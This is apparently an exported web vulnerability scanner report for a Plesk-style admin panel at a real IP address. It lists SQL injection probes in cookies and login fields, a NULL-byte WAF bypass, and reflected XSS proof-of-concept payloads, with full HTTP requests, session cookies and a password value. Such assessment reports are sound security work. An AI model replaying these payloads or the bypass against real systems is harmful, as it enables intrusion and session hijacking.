<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...

1.30. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [user cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/available/id/apscatalog/

Issue detail

The user cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the user cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /smb/app/available/id/apscatalog/?category='%22--%3E%3Cscript%3Ealert(0x000819)%3C/script%3E HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: 174.122.23.218:8880
Cookie: user=54a8ad2443247fe6e4900290dc4e0cf8'; do-not-show-getting-started-popup=true; show-getting-started-popup=true; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:12:52 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

GET /smb/app/available/id/apscatalog/?category='%22--%3E%3Cscript%3Ealert(0x000819)%3C/script%3E HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: 174.122.23.218:8880
Cookie: user=54a8ad2443247fe6e4900290dc4e0cf8''; do-not-show-getting-started-popup=true; show-getting-started-popup=true; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; SessionID=42b54cb11fc3aedbd; psaContext=dashboard; testCookie=test

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /smb/login?returnUrl=%2Fapp%2Favailable%2Fid%2Fapscatalog%2F%3Fcategory%3D%27%2522--%253E%253Cscript%253Ealert%280x000819%29%253C%2Fscript%253E
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 03:12:54 GMT
Connection: close
Content-Length: 0


1.31. http://174.122.23.218:8880/smb/login [loginSection%5Busername%5D parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/login

Issue detail

The loginSection%5Busername%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the loginSection%5Busername%5D parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /smb/login HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/login?returnUrl=%2F
Origin: http://174.122.23.218:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=true; PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73
Content-Length: 166

loginSection%5Busername%5D=Administrator'&loginSection%5Bpassword%5D=46X1gQxTHGY&loginSection%5BrememberMe%5D=0&loginSection%5BrememberMe%5D=1&returnUrl=%2F&force=0&_=

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:48:47 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

POST /smb/login HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/login?returnUrl=%2F
Origin: http://174.122.23.218:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=true; PLESKSESSID=9d849cf17c2d47b0f3a3632f74ebeeaf; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73
Content-Length: 166

loginSection%5Busername%5D=Administrator''&loginSection%5Bpassword%5D=46X1gQxTHGY&loginSection%5BrememberMe%5D=0&loginSection%5BrememberMe%5D=1&returnUrl=%2F&force=0&_=

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:48:48 GMT
Connection: close
Content-Length: 260

{"formMessages":null,"status":"error","statusMessages":[{"status":"error","content":"Wrong username or password specified. Please enter a valid username and password. If you forgot your password, clic
...[SNIP]...

1.32. http://174.122.23.218:8880/smb/role/create/ [user cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/role/create/

Issue detail

The user cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the user cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /smb/role/create/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8%00'; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:16:25 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

GET /smb/role/create/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8%00''; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /smb/login?returnUrl=%2Frole%2Fcreate%2F
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:16:27 GMT
Connection: close
Content-Length: 0


1.33. http://174.122.23.218:8880/smb/role/list/ [user cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/role/list/

Issue detail

The user cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the user cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /smb/role/list/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8'; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:55 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

GET /smb/role/list/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8''; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:57 GMT
Connection: close
Content-Length: 13105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...

1.34. http://174.122.23.218:8880/smb/web/view/id/1/ [user cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/web/view/id/1/

Issue detail

The user cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the user cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /smb/web/view/id/1/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8%00'; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US

Response 1

HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:27:39 GMT
Content-Length: 1208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" cont
...[SNIP]...

Request 2

GET /smb/web/view/id/1/ HTTP/1.1
Accept: */*
Referer: http://174.122.23.218:8880/smb/admin-home
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8%00''; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645; sessionID=ratyxspkfhncnbudbnjoxfoj; PLESKSESSID=10321169792bce25daa15603ea9ba645; locale=en-US

Response 2

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /smb/login?returnUrl=%2Fweb%2Fview%2Fid%2F1%2F
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:27:39 GMT
Connection: close
Content-Length: 0


2. Cross-site scripting (reflected)  previous  next
There are 5 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/available/id/apscatalog/

Issue detail

The value of the category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 819d9</script><script>alert(1)</script>84e52f6ee11 was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /smb/app/available/id/apscatalog/?category=819d9</script><script>alert(1)</script>84e52f6ee11 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: 174.122.23.218:8880
Cookie: user=54a8ad2443247fe6e4900290dc4e0cf8; do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:30:57 GMT
Connection: close
Content-Length: 15521


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
t to try it.","marketplaceMoreInfo":"For more information, visit %%link%%.","marketplaceMoreInfoLink":"the app vendor's website"},
baseUrl: '/smb',
category: '819d9</script><script>alert(1)</script>84e52f6ee11',
details: null,
resizeCallback: "Smb.Views.Apps.resizeBlocks"
});
});
</script>
...[SNIP]...

2.2. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/available/id/apscatalog/

Issue detail

The value of the category request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00de641</script>f5838bd3d85 was submitted in the category parameter. This input was echoed as de641</script>f5838bd3d85 in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /smb/app/available/id/apscatalog/?category=Web%2FContent+management%00de641</script>f5838bd3d85 HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/app/top-categories-data/
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:29:53 GMT
Connection: close
Content-Length: 15519


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
aceMoreInfo":"For more information, visit %%link%%.","marketplaceMoreInfoLink":"the app vendor's website"},
baseUrl: '/smb',
category: 'Web/Content management.de641</script>f5838bd3d85',
details: null,
resizeCallback: "Smb.Views.Apps.resizeBlocks"
});
});
</script>
...[SNIP]...

2.3. http://174.122.23.218:8880/smb/app/available/id/apscatalog/ [category parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/available/id/apscatalog/

Issue detail

The value of the category request parameter is copied into the HTML document as plain text between tags. The payload b84df<script>alert(1)</script>b8f6a35284f was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /smb/app/available/id/apscatalog/?category='%22--%3E%3Cscript%3Ealert(0x000819)%3C/script%3Eb84df<script>alert(1)</script>b8f6a35284f HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: 174.122.23.218:8880
Cookie: user=54a8ad2443247fe6e4900290dc4e0cf8; do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:31:01 GMT
Connection: close
Content-Length: 15550


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script>b84df<script>alert(1)</script>b8f6a35284f',
details: null,
resizeCallback: "Smb.Views.Apps.resizeBlocks"
});
});
</script>
...[SNIP]...

2.4. http://174.122.23.218:8880/smb/file/copy [items%5B0%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/copy

Issue detail

The value of the items%5B0%5D request parameter is copied into the HTML document as plain text between tags. The payload b24af<img%20src%3da%20onerror%3dalert(1)>2312b78d569de41f4 was submitted in the items%5B0%5D parameter. This input was echoed as b24af<img src=a onerror=alert(1)>2312b78d569de41f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /smb/file/copy?type=external&folder=&targetType=shared&targetFolder=&force=false&items%5B0%5D=2010-attacks.jpgb24af<img%20src%3da%20onerror%3dalert(1)>2312b78d569de41f4&_= HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/file/index/type/external
Origin: http://174.122.23.218:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=false; do-not-show-getting-started-popup=true; show-getting-started-popup=true; user=187d997e8ea6a5d0f56792f7f9ba70a4; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:36:39 GMT
Connection: close
Content-Length: 238

{"status":"ERROR","message":"Unable to copy: internal WebDAV service error. Error code: 404. Contact the server administrator to resolve this problem.","data":{"2010-attacks.jpgb24af<img src=a onerror=alert(1)>2312b78d569de41f4":"ERROR"}}

2.5. http://174.122.23.218:8880/smb/file/index/type/external/ [folder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/index/type/external/

Issue detail

The value of the folder request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a008</script><script>alert(1)</script>bfba8db7d4d was submitted in the folder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /smb/file/index/type/external/?folder=3a008</script><script>alert(1)</script>bfba8db7d4d HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: show-getting-started-popup=false; do-not-show-getting-started-popup=true; show-getting-started-popup=true; user=187d997e8ea6a5d0f56792f7f9ba70a4; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; locale=en-US; psaContext=domains

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:14:33 GMT
Connection: close
Content-Length: 49586


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
st-data',
